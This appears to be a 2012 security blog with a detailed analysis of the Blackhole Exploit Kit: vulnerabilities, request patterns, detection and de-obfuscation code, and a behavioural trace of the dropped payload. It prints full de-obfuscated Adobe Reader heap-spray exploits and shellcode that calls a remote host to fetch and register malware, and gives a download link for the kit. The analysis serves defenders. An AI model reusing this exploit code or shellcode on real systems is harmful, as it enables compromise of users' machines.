or...
Virus Totally undetected,
or...
Totally gone to shit,
or...
Fuck, you just made my job that much harder!
Anyways.. I had to rant.. enough embarrassment, besides.. "Blogging" is like graffiti with punctuation!
Now, onto the goods dammit!
In the past, VirusTotal offered a unique feature: given a URL, it would scan the domain and also fetch and scan the file the web server was serving at that URL. For example:
hxxp://www.thisisabadfile.com/bad/file/virus.exe
VirusTotal would scan the domain: thisisabadfile
Then
VirusTotal would simultaneously scan the file: virus.exe
This provided a great way to analyze files and domains.
However, this feature no longer exists.
VirusTotal has moved their services to the cloud and domain/file checking is no longer rolled into one operation.
VirusTotal forces the user to "Upload" a file to use this functionality.
Security analysts on a secure network segment cannot always pull down or obtain a copy/sample of the malicious/suspected file to submit.
Tisk tisk VT.. I've lost faith.. Hopefully you fix this!
To be continued..
Information Security research, Malware, Computing, Rants, and Sarcasm!
Monday, January 30, 2012
Monday, January 16, 2012
Would you like to Block All Drive-by-Download Exploits
This will be a short and sweet post, but I have reason to believe these guys over at "BLADE" are doing amazing work at combating drive-by exploits and malware.
Check out the following:
http://www.blade-defender.org/
Thanks!
Thursday, January 12, 2012
The Blackhole Exploit Kit
The following document provides a detailed overview and in-depth analysis of the Blackhole Exploit Kit. It also gives security professionals and infosec analysts an understanding of the kit's techniques and methods along with a technical overview. It explains how to accurately identify communication between internal source IPs and malicious Blackhole Exploit Kit “GET” requests, and it thoroughly covers the stages from initial request, to exploit delivery, to the compromise of end-user machines.
What is the Blackhole Exploit Kit?
A type of crimeware web application, developed in Russia, that helps attackers take advantage of unpatched vulnerabilities in order to compromise computers via malicious scripts planted on compromised websites. Unsuspecting users visiting these compromised sites are redirected to a malware portal website that exploits browser vulnerabilities in order to distribute banking Trojans or similar malware to the visiting computer. Blackhole Exploit Kits are based on PHP with a MySQL backend and incorporate support for exploiting the most widely used and vulnerable security flaws in order to give attackers the highest probability of successful exploitation. The kits typically target versions of the Windows operating systems and applications installed on Windows platforms. However, the Blackhole Exploit Kit provides the attacker with great functionality and flexibility: the attacker can fully customize and modify which exploits, vulnerabilities, operating systems, and devices they wish to take advantage of. There are several Blackhole Exploit Kits designed to compromise iPhones, iPads, Mac OS, and several versions of Linux. Typically within the SOC, we’ve observed the majority of the exploits targeting the Windows operating system, taking advantage of vulnerabilities in Flash, Shockwave, and Adobe Reader. These exploits and applications will be demonstrated later in this document.
The first Blackhole Exploit Kit appeared on the black market in August 2010 as a Web application available for sale on a subscription basis ($1,500 for an annual license). Newer releases and a free version of the Blackhole Exploit Kit have since appeared on warez download sites as well as the following website:
hxxp://www.multiupload.com/ZTZPEA9L5Y.
The Blackhole Exploit Kit uses several protection mechanisms, such as:
- Integrated antivirus checking based on the API of popular blackhat AVCheck services
- A blacklist database of referrers and IP addresses (including ranges) used to block access to the system
The kit's settings allow criminals to choose a Russian or English interface language, which suggests that the kit was developed in Russia, and to change the name of the malicious payload file and its parameters to make it undetectable by AVs. Exploits are encrypted with custom algorithms, which makes this pack difficult to analyze with AVs and generic de-obfuscation tools and services. The Blackhole Exploit Kit uses the Java OBE (Open Business Engine) toolkit to spread exploits and load the malicious executable onto the victim's machine. Once a victim follows the malicious iframe, they download a JAR file with an encoded URL parameter; one of the classes in this JAR file decodes the parameter into a clear-text URL. The URL is concatenated with an HTTP GET parameter and used to download further malicious payload files. The exploit kit itself is encrypted with the commercial php-cryptor, which keeps the whole distribution tightly controlled and sophisticated. The kit is therefore only rented by the criminals and not sold like many others.
Below is a running list of vulnerabilities that have been used with the Black Hole exploit kit:
CVE-2010-1885 HCP
CVE-2010-1423 Java argument injection vulnerability in the URI handler in Java NPAPI plugin
CVE-2010-0886 Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE
CVE-2010-0842 Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability
CVE-2010-0840 Java trusted Methods Chaining Remote Code Execution Vulnerability
CVE-2009-1671 Java buffer overflows in the Deployment Toolkit ActiveX control in deploytk.dll
CVE-2009-0927 Adobe Reader Collab GetIcon
CVE-2008-2992 Adobe Reader util.printf
CVE-2007-5659 Adobe Reader CollectEmailInfo
CVE-2006-0003 IE MDAC
What does a Blackhole Exploit Kit “GET” request look like?
The majority of Blackhole Exploit Kit “GET” requests share several similarities. In the examples below, you’ll notice most of the malicious GET requests are for PHP pages with a query string starting at the “?” delimiter and a single parameter of the form page=****************:
| URL |
|---|
| hxxp://yqriyclplu.dns05.com/main.php?page=c69bd02e93e6957c |
| hxxp://youthofthenationalists.com/main.php?page=6262b9195f9ee4c6 |
| hxxp://ymasuker.c0m.li/main.php?page=beceaa39e272bf3c |
| hxxp://xrgcryjutkdygkshh.cx.cc/forum.php?tp=4e6c4f8cec3579c9 |
The number of compromised websites hosting malicious Blackhole Exploit Kit code has greatly increased over the past eight months. Numerous websites are hosting this malicious code without their owners' knowledge or consent. Typically end users are redirected via iframes from the compromised websites. However, at the time of this writing I have noticed a change in the communication profile: currently, end users are redirected from a completely different website to the Blackhole Exploit Kit portal, where previously they were sent directly to the URLs seen above.
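As an added example (not code from the original post), here is a small proxy-log check that flags requests with the shape shown above: a PHP page, a single `page=` or `tp=` parameter, and a 16-character hex token. The hostnames in the sample log are the ones quoted on this page; the source IPs and the other lines are constructed, and the fixed 16-hex token length is an assumption drawn from these examples, so widen it if your own samples differ.

```python
import re
from typing import Dict, List, Optional

# Request shape from the URLs above: a PHP page, one query parameter, and a
# 16-character hex token as its value. "page" and "tp" are the parameter
# names seen on this page; the fixed token length is an assumption.
BLACKHOLE_GET_RE = re.compile(
    r"^https?://(?P<host>[^/\s]+)/(?P<page>[a-z0-9_]+\.php)"
    r"\?(?P<param>page|tp)=(?P<token>[0-9a-f]{16})$",
    re.IGNORECASE,
)

# Constructed proxy log lines ("source-ip method url"); the kit hostnames are
# the ones quoted on this page, everything else is made up for the example.
SAMPLE_LOG = """\
10.0.0.12 GET http://yqriyclplu.dns05.com/main.php?page=c69bd02e93e6957c
10.0.0.12 GET http://www.example.com/index.php?page=about
10.0.0.37 GET http://xrgcryjutkdygkshh.cx.cc/forum.php?tp=4e6c4f8cec3579c9
10.0.0.37 GET http://www.example.com/forum.php?tp=1234
10.0.0.51 GET http://ymasuker.c0m.li/main.php?page=beceaa39e272bf3c
"""


def classify_url(url: str) -> Optional[Dict[str, str]]:
    """Return the matched fields if the URL has the Blackhole GET shape, else None."""
    m = BLACKHOLE_GET_RE.match(url.strip())
    return m.groupdict() if m else None


def scan_log(log_text: str) -> List[Dict[str, str]]:
    """Walk 'src method url' lines and return one record per suspicious request."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        src, _method, url = parts
        fields = classify_url(url)
        if fields is not None:
            hits.append({"src": src, **fields})
    return hits


def sources_to_investigate(hits: List[Dict[str, str]]) -> List[str]:
    """Unique internal source IPs that issued a matching request (Stage-1 candidates)."""
    return sorted({h["src"] for h in hits})


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for hit in found:
        print(f"{hit['src']} -> {hit['host']}/{hit['page']}?{hit['param']}={hit['token']}")
    print("investigate:", sources_to_investigate(found))
```

The two `example.com` lines show why the token check matters: `index.php?page=about` and `forum.php?tp=1234` use the same parameter names but are ordinary requests, and the regex leaves them alone.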
Blackhole Exploit Kit obfuscation:
Start of obfuscation:
```html
<html><body><script>
null+function(){
c='createCommen';
}();
aa=(document[c.concat('t')]+'qwe').substr(2,4);
a=[null,new Array(90,
101,
89,
x57x48x94x101x58x10…
```
(the array continues for quite some time!)
End of obfuscation:
```javascript
if((aa=='ncti')||(aa=='ctio')||(aa=='unct')){w=String;}
md="a";
c='';
i=0;
s=a[4-3];
while(i!=s.length){
  c=c+w["f"+"r"+"omCharCo"+"d"+'e'](s + 10);
  i++;
}
e=eval;
e(c);
```
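The two pieces of the sample above that decide whether a de-obfuscation tool sees anything are the `substr(2,4)` environment check and the `fromCharCode(... + 10)` loop. As an added example (not part of the original post), the Python below reproduces both statically: it applies the check to the stringified form of a native function as a real browser produces it versus what a bare emulator produces, and it runs the decode loop as I read it (each array value plus 10) while returning the decoded text instead of passing it to `eval`. The `BROWSER_TOSTRING`, `EMULATOR_TOSTRING` strings and the sample second stage are constructed; the kit's real array is not reproduced.

```python
from typing import Iterable, List, Optional

# The sample's environment check: (document.createComment + 'qwe').substr(2, 4).
# A real browser stringifies a native function as "function createComment() ..."
# so characters 2..5 are "ncti"; an emulator whose objects stringify as
# "[object Object]" fails the check and the decode loop never runs.
BROWSER_TOSTRING = "function createComment() { [native code] }"   # constructed
EMULATOR_TOSTRING = "[object Object]"                              # constructed
ACCEPTED = ("ncti", "ctio", "unct")


def browser_check_value(native_fn_tostring: str) -> str:
    """JavaScript (x + 'qwe').substr(2, 4) on the stringified native function."""
    return (native_fn_tostring + "qwe")[2:6]


def passes_browser_check(native_fn_tostring: str) -> bool:
    return browser_check_value(native_fn_tostring) in ACCEPTED


def decode_payload(codes: Iterable[int], offset: int = 10) -> str:
    """Static equivalent of the decode loop as I read it: append
    String.fromCharCode(value + 10) for each array element. The decoded
    text is returned for inspection instead of being passed to eval."""
    return "".join(chr(code + offset) for code in codes)


def encode_for_demo(text: str, offset: int = 10) -> List[int]:
    """Inverse of decode_payload; used only to build the constructed sample array."""
    return [ord(ch) - offset for ch in text]


# Constructed sample second stage, encoded the way the kit's array is. The
# kit's real array is not reproduced; the page token is an obvious placeholder.
SAMPLE_SECOND_STAGE = (
    "document.write('<iframe src=\"main.php?page=0000000000000000\"></iframe>');"
)
SAMPLE_ARRAY = encode_for_demo(SAMPLE_SECOND_STAGE)


def analyze(native_fn_tostring: str, codes: Iterable[int]) -> Optional[str]:
    """Mirror the sample's control flow: decode only if the environment check
    passes, and hand back the would-be eval() argument instead of executing it."""
    if not passes_browser_check(native_fn_tostring):
        return None
    return decode_payload(codes)


if __name__ == "__main__":
    print("browser :", analyze(BROWSER_TOSTRING, SAMPLE_ARRAY))
    print("emulator:", analyze(EMULATOR_TOSTRING, SAMPLE_ARRAY))
```

The first three values in the page's array (90, 101, 89) come out as "doc" under this reading, which is consistent with a second stage that starts with `document`. That is also why a naive JavaScript emulator returns nothing for this sample: it fails the `substr(2,4)` check before the loop ever runs, so decode the array directly rather than trusting an empty eval trace.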
Blackhole Exploit Kit de-obfuscation:
The Blackhole Exploit Kit obfuscation can be manually de-obfuscated after careful review of the code. The decoding logic is typically wrapped around an array and several variables. I’ve used Malzilla for most of the research and manual de-obfuscation provided in this analysis.
However, http://www.urlquery.net provides an excellent resource for automatically de-obfuscating Blackhole Exploit Kit “version 1.2” GET requests.
After you provide urlquery.net with a Blackhole Exploit Kit “GET” request, it returns the results auto-magically. To view sample output from urlquery, please review the following report:
http://urlquery.net/report.php?id=15308
Analysis of the de-ob’d Blackhole Exploit Kit:
The following is a snippet of the de-obfuscated code from the Blackhole Exploit Kit. This snippet is used to exploit the end user's system. Reviewing the code, you will notice various attempts to exploit specific Java and Adobe Reader versions.
[Figure: Spl() - Sploit Function]
Stages of the Blackhole Exploit Kit:
Stage-1: Initial communication to the Blackhole Exploit Kit.
At this stage, many end users and source IPs are actively communicating with known Blackhole Exploit Kit sites/URLs but have not yet been passed to “Stage-2” for exploitation.
Assuming the end user’s user-agent string suffices for communication with the Blackhole Exploit Kit, the end user will have cycled through the chained spl() functions, which contain the Java exploits and malicious .pdf files. For example, you’ll notice some version checking, and shortly after the Blackhole Exploit Kit offers up a malicious .pdf file. Below are the strings from the spl() function that serve up the malicious .pdf file:
show_pdf ('./content/fdp1.php?f=25')
show_pdf ('./content/fdp2.php?f=25')
Stage-2: Version checking was successful and the end user's browser and installed application versions meet the requirements to successfully exploit the application and the end user's machine/system. I consider “Stage-2” successful when an end user has requested a shortened version of the URL, including the above .pdf or .jar files contained within the spl() function.
You may review the malicious .pdf file by visiting the following link:
http://wepawet.iseclab.org/view.php?hash=c1b93adbf7ec963a8758cc2ed66f7536&type=js
You'll notice instantly that the submitted .pdf file is clearly malicious. Further review of the file shows it is riddled with shellcode, exploits, and callbacks!
Exploits
| Name | Description | Reference |
|---|---|---|
| Adobe getIcon | Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object | |
Deobfuscation results
Evals
Two evals were observed, each once: the script below, and the string `1` produced by the script's own e("1") call.
```javascript
if (e("1")) bjsg = " %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db %u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175 %uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33 %ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b %uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433 %u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68 %u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d %u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224 %u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b %uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830 %u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83 %u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff %ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f %u7468%u7074%u2f3a%u722f%u657a%u6b6c%u666b%u6e2e%u3373%u6e2e%u6d61%u2f65%u2e77%u6870%u3f70 %u3d66%u3631%u6526%u333d%u0000";
function ezvr(ra, qy){
  while (ra.length * 2 < qy){ ra += ra; }
  ra = ra.substring(0, qy /2);
  return ra;
}
function bx(){
  var dkg=new Array();
  var vw=0x0c0c0c0c;
  var addr=0x400000;
  var payload=unescape(bjsg);
  var sc_len=payload.length*2;
  var qy=addr-(sc_len+0x38);
  var yarsp=unescape("%u9090%u9090");
  yarsp=ezvr(yarsp,qy);
  var count2=(vw-0x400000)/addr;
  for (var count = 0; count < count2; count ++ ){ dkg[count] = yarsp + payload; }
  var overflow = unescape("%u0c0c%u0c0c");
  while (overflow.length < 44952){ overflow += overflow; }
  this.collabStore = Collab.collectEmailInfo({ subj : "", msg : overflow } );
}
function printf(){
  nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  var payload = unescape(bjsg);
  heapblock = nop + payload;
  bigblock = unescape("%u0A0A%u0A0A");
  headersize = 20;
  spray = headersize + heapblock.length;
  while (bigblock.length < spray){ bigblock += bigblock; }
  fillblock = bigblock.substring(0, spray);
  block = bigblock.substring(0, bigblock.length - spray);
  while (block.length + spray < 0x40000){ block = block + block + fillblock; }
  mem = new Array();
  for (i = 0; i < 1400; i ++ ){ mem[i] = block + heapblock; }
  var num = 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888;
  util.printf("%45000f", num);
}
function geticon(){
  var arry = new Array();
  if (app.doc.Collab.getIcon){
    var payload = unescape(bjsg);
    var hWq500CN = payload.length * 2;
    var qy = 0x400000 - (hWq500CN + 0x38);
    var yarsp = unescape("%u9090%u9090");
    yarsp = ezvr(yarsp, qy);
    var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
    for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){ arry[vqcQD96y] = yarsp + payload; }
    var tUMhNbGw = unescape("%09");
    while (tUMhNbGw.length < 0x4000){ tUMhNbGw += tUMhNbGw; }
    tUMhNbGw = "N." + tUMhNbGw;
    app.doc.Collab.getIcon(tUMhNbGw);
  }
}
aPlugins = app.plugIns;
var sv = parseInt(app.viewerVersion.toString().charAt(0));
for (var i = 0; i < aPlugins.length; i ++ ){ if (aPlugins[i].name == "EScript"){ var lv = aPlugins[i].version; } }
if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){ geticon(); }
else if (lv == 7.1){ printf(); }
else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){ bx(); }
else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){
  function a(){ util.printd("p@111111111111111111111111 : yyyy111", new Date()); }
  var h = app.plugIns;
  for (var f = 0; f < h.length; f ++ ){ if (h[f].name == "EScript"){ var i = h[f].version; } }
  if ((i > 8.12) && (i < 8.2)){
    c = new Array();
    var d = unescape("%u9090%u9090");
    var e = unescape(bjsg);
    while (d.length <= 0x8000){ d += d; }
    d = d.substr(0, 0x8000 - e.length);
    for (f = 0; f < 2900; f ++ ){ c[f] = d + e; }
    a(); a();
    try { this.media.newPlayer(null); } catch (e){ }
    a();
  }
}
```
Writes
No writes.
Network Activity
Requests
| URL |
|---|
| file://6646f.pdf |
ActiveX controls
- AcrobatJavaScript
| Method | Arg0 |
|---|---|
| Collab.getIcon | 4e 2e 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 (other 16288 bytes) 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 |
Shellcode
| Hexadecimal | ASCII |
|---|---|
66 83 e4 fc fc 85 e4 75 34 e9 5f 33 c0 64 8b 40 30 8b 40 0c 8b 70 1c 56 8b 76 08 33 db 66 8b 5e 3c 03 74 33 2c 81 ee 15 10 ff ff b8 8b 40 30 c3 46 39 06 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51 56 8b 75 3c 8b 74 35 78 03 f5 56 8b 76 20 03 f5 33 c9 49 41 fc ad 03 c5 33 db 0f be 10 38 f2 74 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 e6 5e 8b 5e 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 24 0c 8b d8 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb 53 ad 8b 68 20 80 7d 0c 33 74 03 96 eb f3 8b 68 08 8b f7 6a 05 59 e8 98 ff ff ff e2 f9 e8 00 00 00 00 58 50 6a 40 68 ff 00 00 00 50 83 c0 19 50 55 8b ec 8b 5e 10 83 c3 05 ff e3 68 6f 6e 00 00 68 75 72 6c 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff ff ff eb 02 eb 72 81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72 65 67 73 c7 44 24 04 76 72 33 32 c7 44 24 08 20 2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9 51 c7 44 1d 00 77 70 62 74 c7 44 1d 05 2e 64 6c 6c c6 44 1d 09 00 59 8a c1 04 30 88 44 1d 04 41 51 6a 00 6a 00 53 57 6a 00 ff 56 14 85 c0 75 16 6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ff 56 04 83 c3 0c eb 02 eb 13 47 80 3f 00 75 fa 47 80 3f 00 75 c4 6a 00 6a fe ff 56 08 e8 9c fe ff ff 8e 4e 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca 8a 5b 1b c6 46 79 36 1a 2f 70 68 74 74 70 3a 2f 2f 72 7a 65 6c 6b 6b 66 2e 6e 73 33 2e 6e 61 6d 65 2f 77 2e 70 68 70 3f 66 3d 31 36 26 65 3d 33 00 00 | f......u4._3.d.@ 0.@..p.V.v.3.f.^ <.t3,........@0. F9.u..4$..uQ..LQ V.u<.t5x..V.v... 3.IA....3....8.t ......@..;.u.^.^ $..f..K.F..T$... ........^Y..S..h ..}.3t.....h...j .Y............XP j@h....P...PU... ^......hon..hurl mT........a..... .r.......\$...$r egs.D$.vr32.D$.. -s.Sh.....V...3. Q.D..wpbt.D...dl l.D...Y...0.D..A Qj.j.SWj..V...u. j.S.V.j....S.V.. ......G.?.u.G.?. u.j.j..V.......N .......o..3..[.. Fy6./phttp://rze lkkf.ns3.name/w. php?f=16&e=3.. |
Malware
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|---|---|---|
| http://rzelkkf.ns3.name/w.php?f=16&e=3 | N/A | N/A | |
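The callback URL in the table above is visible in the ASCII column of the shellcode dump, which is the quickest way to get indicators out of a sample like this without running it. As an added example (not code from the original post or from wepawet), the Python below decodes two fragments copied from the hex dump on this page, the region that assembles a command line and the tail carrying the URL, and runs a minimal `strings`-style scan plus a URL match over the raw bytes. The fragment names and the helper functions are my own; the hex values are the page's.

```python
import re
from typing import Dict, List

# Hex-dump fragments copied from the wepawet shellcode listing above: the
# region that builds a command line and the tail that carries the callback
# URL. The rest of the dump is omitted here.
HEX_FRAGMENT_CMD = (
    "81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72 65 67 73 c7 44 24 04 76 72 33 32 "
    "c7 44 24 08 20 2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9 51 c7 44 1d "
    "00 77 70 62 74 c7 44 1d 05 2e 64 6c 6c c6 44 1d 09 00"
)
HEX_FRAGMENT_URL = (
    "2f 70 68 74 74 70 3a 2f 2f 72 7a 65 6c 6b 6b 66 2e 6e 73 33 2e 6e 61 6d 65 "
    "2f 77 2e 70 68 70 3f 66 3d 31 36 26 65 3d 33 00 00"
)

# A URL embedded as plain text ends at a NUL, whitespace or a quote.
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?:/[^\s\x00\"']*)?")


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn 'xx xx xx' text into raw bytes."""
    return bytes(int(tok, 16) for tok in dump.split())


def extract_strings(blob: bytes, min_len: int = 4) -> List[str]:
    """Printable ASCII runs of at least min_len bytes (the 'strings' technique)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def extract_urls(blob: bytes) -> List[str]:
    """URLs embedded in the shellcode as plain text."""
    return [m.group().decode("ascii") for m in URL_RE.finditer(blob)]


def indicators_from_dump(dump: str) -> Dict[str, List[str]]:
    """Strings and URLs recoverable from one hex-dump fragment."""
    blob = hexdump_to_bytes(dump)
    return {"strings": extract_strings(blob), "urls": extract_urls(blob)}


if __name__ == "__main__":
    for name, frag in (("cmd", HEX_FRAGMENT_CMD), ("url", HEX_FRAGMENT_URL)):
        print(name, indicators_from_dump(frag))
```

The command-line region comes out in four-byte pieces ("vr32", " -s Sh", "wpbt", ".dll") because the shellcode writes its string onto the stack one immediate at a time, with `c7 44 24 xx` (a `mov` to a stack slot) between each piece; that is why a plain `strings` run shows fragments rather than the whole command, and why a short minimum length is worth using on shellcode. The URL fragment decodes cleanly to `http://rzelkkf.ns3.name/w.php?f=16&e=3`, matching the table above.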
Stage-3: Either Java or the malicious .pdf file has successfully exploited the end user.
The malicious .pdf has been executed, has exploited the vulnerable application, and has performed a callback for additional malware.
The most important information from the analysis of the malicious .pdf file is the additional-malware indicator. Using a proxy such as Malzilla, we were able to send a request to the above URL, “hxxp://rzelkkf.ns3.name/w.php?f=16&e=3”, which clearly delivers the Trojan/RAT etc. The file we received is disguised as a normal Windows file: calc.exe, fun.exe, notepad.exe, or in this scenario readme.exe.
Behavioral Analysis of readme.exe
The following is a snippet from a capture using Process Monitor:
| Operation | Path | Result |
|---|---|---|
| TCP Send | alpha-orion:2322 -> 31.44.184.49:http | SUCCESS |
| TCP Receive | alpha-orion:2322 -> 31.44.184.49:http | SUCCESS |
| RegQueryKey | HKCU\Software\Classes | SUCCESS |
| RegOpenKey | HKCU\Software\Classes\MIME\Database\Content Type\text/html | NAME NOT FOUND |
| RegOpenKey | HKCR\MIME\Database\Content Type\text/html | SUCCESS |
| RegQueryKey | HKCR\MIME\Database\Content Type\text/html | SUCCESS |
| RegOpenKey | HKCU\Software\Classes\MIME\Database\Content Type\text/html | NAME NOT FOUND |
| RegQueryValue | HKCR\MIME\Database\Content Type\text/html\Extension | SUCCESS |
| CreateFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| SetBasicInformationFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| QueryBasicInformationFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| CreateFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| QueryNetworkOpenInformationFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1V0DH5TZ\up[1].htm | SUCCESS |
| CreateFile | C:\Users\alpha\Desktop\Malware\readme.exe | SUCCESS |
| QueryAttributeTagFile | C:\Users\alpha\Desktop\Malware\readme.exe | SUCCESS |
| QueryBasicInformationFile | C:\Users\alpha\Desktop\Malware\readme.exe | SUCCESS |
| CreateFile | C:\Users\alpha\AppData\Local\Temp | SUCCESS |
| SetRenameInformationFile | C:\Users\alpha\Desktop\Malware\readme.exe | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Temp | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Temp\BHCsBWQnNnvaBm.exe.tmp | SUCCESS |
| CreateFile | C:\Users\alpha\AppData\Local\Temp\BHCsBWQnNnvaBm.exe.tmp | SUCCESS |
| QueryAttributeTagFile | C:\Users\alpha\AppData\Local\Temp\BHCsBWQnNnvaBm.exe.tmp | SUCCESS |
| RegCreateKey | HKLM\System\CurrentControlSet\Control\Session Manager | REPARSE |
| RegCreateKey | HKLM\System\CurrentControlSet\Control\Session Manager | SUCCESS |
| RegQueryValue | HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations2 | NAME NOT FOUND |
| RegCloseKey | HKLM\System\CurrentControlSet\Control\Session Manager | SUCCESS |
| RegCreateKey | HKLM\System\CurrentControlSet\Control\Session Manager | REPARSE |
| RegCreateKey | HKLM\System\CurrentControlSet\Control\Session Manager | SUCCESS |
| RegQueryValue | HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations | NAME NOT FOUND |
| RegSetValue | HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations | SUCCESS |
| RegCloseKey | HKLM\System\CurrentControlSet\Control\Session Manager | SUCCESS |
| CloseFile | C:\Users\alpha\AppData\Local\Temp\BHCsBWQnNnvaBm.exe.tmp | SUCCESS |
| Thread Exit | SUCCESS | |
| RegCloseKey | HKLM\SOFTWARE\Policies | SUCCESS |
| RegCloseKey | HKCU\Software\Policies | SUCCESS |
| RegCloseKey | HKCU\Software | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | SUCCESS |
| RegCloseKey | HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | SUCCESS |
| RegCloseKey | HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Internet Explorer\IETld | SUCCESS |
| RegCloseKey | HKCR\MIME\Database\Content Type\text/html | SUCCESS |
| RegCloseKey | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer | SUCCESS |
| RegOpenKey | HKLM\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize | SUCCESS |
| RegQueryValue | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles | NAME NOT FOUND |
| RegCloseKey | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize | SUCCESS |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| Thread Exit | SUCCESS | |
| QueryNameInformationFile | C:\Users\alpha\AppData\Local\Temp\BHCsBWQ | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\winrnr.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\pnrpnsp.dll | SUCCESS |
| QueryNameInformationFile | C:\Windows\System32\NapiNSP.dll | SUCCESS |
